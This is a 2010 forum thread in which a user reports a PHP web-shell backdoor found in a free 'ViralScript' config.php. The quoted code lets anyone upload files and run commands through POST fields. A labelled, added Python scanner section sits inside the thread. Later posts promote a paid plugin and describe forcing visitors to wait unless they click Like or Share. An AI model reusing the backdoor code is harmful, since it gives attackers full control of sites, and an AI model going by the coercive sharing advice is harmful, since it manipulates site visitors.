
ViralScript = backdoor to your site?

Discussion in 'BlackHat Lounge' started by kirkonpolttaja, Aug 15, 2010.

  1. kirkonpolttaja

    kirkonpolttaja Senior Member

    Joined:
    Feb 6, 2010
    Messages:
    1,027
    Likes Received:
    669
    Hey all!

    I was building my website and was doing some investigating... I ran into one interesting thing...

    There was this code (I don't post all of it):
    Code:
    echo "</textarea>"; 
    } 
    // ERORR // 
    if(empty($_POST[\'ER\'])){ 
    } else { 
    $ERORR=$_POST[\'ER\']; 
    echo  error_log(" 
    <html> 
    <head> 
    [B]<title> Exploit: error_log() By * TrYaG Team  * </title>[/B] 
    <body bgcolor="#000000"> 
    <table Width=\'100%\' height=\'10%\' bgcolor=\'#8C0404\' border=\'1\'> 
    <tr> 
    <td><center><font size=\'6\' color=\'#BBB516\'> [B]By  TrYaG Team[/B]</font></center></td> 
    </tr> 
    </table> 
    <font color=\'#FF0000\'> 
    </head> 
    <? 
    if($fileup == ""){ 
    ECHO " reade for up "; 
    }else{ 
    $path= exec("pwd"); 
    $path .= "/$fileup_name"; 
    $CopyFile = copy($fileup,"$path"); 
    if($CopyFile){ 
    echo " up ok "; 
    }else{ 
    echo " no up "; 
    } 
    } 
    if(empty($_POST[\'m\'])){ 
    } else { 
    $m=$_POST[\'m\']; 
    echo  system($m); 
    } 
    if(empty($_POST[\'cmd\'])){ 
    } else { 
    $h=  $_POST[\'cmd\']; 
     print include($h) ; 
    } 

    This is found inside ViralScript -> config.php file.

    If this is what I think it is (backdoor for the ViralScript maker to my site) then can someone refer me a similar script WITHOUT these goddamn exploits :)
     
  2. kirkonpolttaja

    kirkonpolttaja Senior Member

    OK, there is now much more revealed... This script (exploit) is made by Mohajer22 named TrYaG Team hacker

    Now as I read and skip the config.php file... it is FULL of TrYaG team's script and passthru cr*p!

    No wonder that this script is shared for free, their team will gain full privileges to your databases :)
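
A defender's triage check for the pattern described in the two posts above, as an added example that is not part of the original thread or of ViralScript: it flags PHP lines where request input reaches a command-execution or file-inclusion call, either directly or through a variable assigned from it. The function name `scan_php`, the sink list beyond the calls named in the thread, and the sample input are assumptions constructed for illustration.

```python
import re

# Request superglobals an attacker controls.
SOURCE = r"\$_(?:POST|GET|REQUEST|COOKIE)\b"
# Command-execution and file-inclusion calls: system, exec and include appear
# in the posted excerpt, passthru in the follow-up; the rest are close relatives.
SINKS = (r"system|exec|shell_exec|passthru|popen|proc_open|eval"
         r"|include(?:_once)?|require(?:_once)?")
# $var = ... $_POST[...]   (plain or .= assignment, not an == comparison)
ASSIGN = re.compile(r"(\$\w+)\s*\.?=(?!=)[^;]*?" + SOURCE)
# sink(args);  or  include args;  but not $system, ->exec or ::eval
CALL = re.compile(r"(?<![$\w>:])(" + SINKS + r")\b\s*\(?([^;]*);", re.I)

def scan_php(source):
    """Return (line_no, sink, reason) for each sink fed by request input."""
    tainted = set()          # variables assigned from a superglobal so far
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        for m in ASSIGN.finditer(line):
            tainted.add(m.group(1))
        for m in CALL.finditer(line):
            sink, args = m.group(1).lower(), m.group(2)
            if re.search(SOURCE, args):
                findings.append((no, sink, "request input passed directly"))
                continue
            hit = [v for v in re.findall(r"\$\w+", args) if v in tainted]
            if hit:
                findings.append((no, sink, "tainted variable " + hit[0]))
    return findings

# Constructed sample: lines 4-7 mirror the quoting style of the posted excerpt
# (escaped quotes, because the code sits inside a string); the rest is made up.
SAMPLE = r"""<?php
$dir = exec("pwd");
if ($mode == $_POST['mode']) { echo "ok"; }
$m=$_POST[\'m\'];
echo  system($m);
$h=  $_POST[\'cmd\'];
 print include($h) ;
passthru($_REQUEST['c']);
"""

if __name__ == "__main__":
    for finding in scan_php(SAMPLE):
        print("line %d: %s() <- %s" % finding)
```

This is a line-based heuristic for triage, not a parser: it does not catch the excerpt's `copy($fileup, ...)` upload branch, which never reads a superglobal by name, and it will miss obfuscated code.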
     
  3. iceinthebox

    iceinthebox Newbie

    Joined:
    Jul 28, 2010
    Messages:
    48
    Likes Received:
    7
    You can find Facebook viral script for WordPress at ilikeviral and use /bhw after .com for BHW member discount ...
     
  4. kirkonpolttaja

    kirkonpolttaja Senior Member

    iceinthebox, thanks for the tip, but will this be as good as viralscript? Or even better? I'm having a freebie site that has this viralscript.

    If you can say yes or no then i might purchase that ilikeviral :)
     
  5. iceinthebox

    iceinthebox Newbie

    Hi,

    Could not send you private message. The link is: http://ilikeviral.com/BHW/

    The main thing here is how you use the plugin and what kind of webpages and visitors you have.

    You can gently push the LIKE/SHARE request in selected pages, for example skip the front page and allow users to click their way out of it immediately by pressing your close message which could say for example "If you don't want to recommend us, Press here", or you can use a more brute method by having a long closing time that visitors must wait to see something on your site if they prefer NOT to press the LIKE or Share button. You can also do something in between and have only a few seconds that user must wait if he does not want to press the LIKE or SHARE.

    There is no question that recommending something to friends by LIKE or SHARE is MUCH more accepted by visitors than forcing them to send individual emails to their friends so pressing this button should be easy and especially if you have interesting things to offer instead! Let's say ebook or whatever else you might have that interests users. This could also be used to access certain articles ...
     
  6. kirkonpolttaja

    kirkonpolttaja Senior Member

    Thanks for the link :) Just purchased and now going to make new site.. starting all over.

    What WP theme is best for squeeze page? Or close to it.
     
  7. MaxPowers

    MaxPowers Regular Member

    Joined:
    Nov 30, 2009
    Messages:
    302
    Likes Received:
    193
    There's lots of free WordPress landing pages.

    Just search "wordpress free landing pages". lol
     
  8. kirkonpolttaja

    kirkonpolttaja Senior Member

    I would like to specially know what is the best-of-the-best for BHW ;) FLEX theme was good if I remember correctly (don't remember the whole theme name.. flex sumthing :D )